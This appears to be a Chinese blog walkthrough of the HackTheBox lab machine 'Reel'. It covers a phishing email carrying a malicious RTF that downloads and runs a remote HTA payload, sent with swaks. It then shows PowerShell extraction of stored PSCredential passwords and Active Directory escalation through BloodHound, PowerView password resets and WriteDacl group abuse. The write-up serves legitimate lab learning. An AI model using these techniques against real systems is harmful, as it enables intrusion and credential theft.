HackTheBox-windows-Reel

靶机地址：https://www.hackthebox.eu/home/machines/profile/143

靶机难度：中级（5.0/10）

靶机发布日期：2018年11月10日

靶机描述：

Reel is medium to hard difficulty machine, which requires a client-side attack to bypass the perimeter, and highlights a technique for gaining privileges in an Active Directory environment.

请注意：对于所有这些计算机，我是通过平台授权允许情况进行渗透的。我将使用Kali Linux作为解决该HTB的攻击者机器。这里使用的技术仅用于学习教育目的，如果列出的技术用于其他任何目标，我概不负责。

一、信息收集

可以看到靶机的IP是10.10.10.77....

Nmap可以看到这是一台Windows Server 2012 R2服务器，该服务器承载FTP，SSH，SMTP和Active Directory域等服务...

可以看到nmap发现ftp是可以匿名访问的...并且存在documents目录...进去看看...

将documents目录文件全都下载了...

意思是可以发送xtf格式的电子邮件给靶机...继续查看下一个文件

果然，查看到了电子邮件[email protected]

这边有了电子邮件号，肯定是要给他发邮件的，而且发送的邮件内容得是.xtf的...这里又可以用钓鱼邮件恶意程序进行提权了...

这里我搜索了rtf的漏洞，这是一个Microsoft Office oday漏洞...

这个漏洞利用了.rtf文件（或有些已重命名为.doc），该文件将连接到远程服务器，然后下载包含HTML应用程序内容的文件，并作为.hta文件来执行，由于.hta是可执行文件，因此攻击者可以在受害者的计算机上执行完整的代码，此逻辑错误还使攻击者可以绕过Microsoft开发的任何基于内存的缓解措施来执行....（可怕的oday漏洞）

查找到了exploit，走起

配置好后，这里还需要修改FILENAME为.rtf即可...

可以看到创建好了恶意程序.rtf文件...而且还托管在了default.hta上...

swaks --to nico@megabank.com --server 10.10.10.77 --attach /root/.msf4/local/dayu.rtf

可以看到成功获得了shell壳...

这里还可以利用mutt、sendemail、telnet等等工具进行发送邮件...不演示了...最近头疼得厉害...

并且直接获得了user信息...

可以看到，在desktop下还存在xml文件，查看后发现了有用的信息...

获得的信息有：XML文件、Objs版本是1.1.0.1、PSC的凭证、用户名：Tom、密码：哈希值...

那么需要破解这个哈希值即可...

找了半天以为是很好破解的哈希值，这里我还注意到了一个信息...PSCredential

PSCredential是powershell中的一个对象，该对象提供了一种存储用户名，密码和凭据的方法，还有两个功能，Import-CliXml和Export-CliXml，用于将这些凭据保存到文件或从文件中还原他，开始利用...

powershell " $credential = Import-CliXml -Path 'C:UsersnicoDesktopcred.xml' ; $credential.getnetworkcredential() | fl *"

可以看到已经获得了密码...

可以看到在Tom的桌面上，有一个名为Bloodhound的文件夹和一个文件note.txt...

文件里告诉我们，SharpHound允许我们发现Active Directory环境中的隐藏依赖关系，并且与BloodHound一起在图形界面中形成依赖关系..

继续往下看，可以看到存在了关系图BloodHound...把acls.csv放到本地，进行查看即可...可以利用smbserver共享传递即可...

net use z: \10.10.14.11share

copy "文件" z:

这里我就不说分析BloodHound的事情了...头很疼...也忘了截图...

这里利用了系统里的PowerView.ps1，然后powershell下利用对象进行修改了claire用户的密码...成功修改...

经过前面的信息，知道clair对Backup_Admins组具有WriteDacl权限，我可以用它来将她添加到群组中。首先，看到该组的唯一成员是ranj...

然后把chair加入进去...

可以看到已经成功加入了...但是没生效，得重新登录...

重新登录后...以claire和Backup_Admins的身份返回，可以检查Administrator文件夹上的权限了...

这里可以看到root信息还无法查看...继续往下走，在BackupScript.ps1里发现了passwd...这是管理员的密码...真是一环套一环...

成功获得root信息...

今天头很疼，但是还是下班后坚持拿下了这台靶机...加油吧，努力的人都很幸运！！！

由于我们已经成功得到root权限查看user.txt和root.txt，因此完成了中级靶机，希望你们喜欢这台机器，请继续关注大余后期会有更多具有挑战性的机器，一起练习学习。

如果你有其他的方法，欢迎留言。要是有写错了的地方，请你一定要告诉我。要是你觉得这篇博客写的还不错，欢迎分享给身边的人。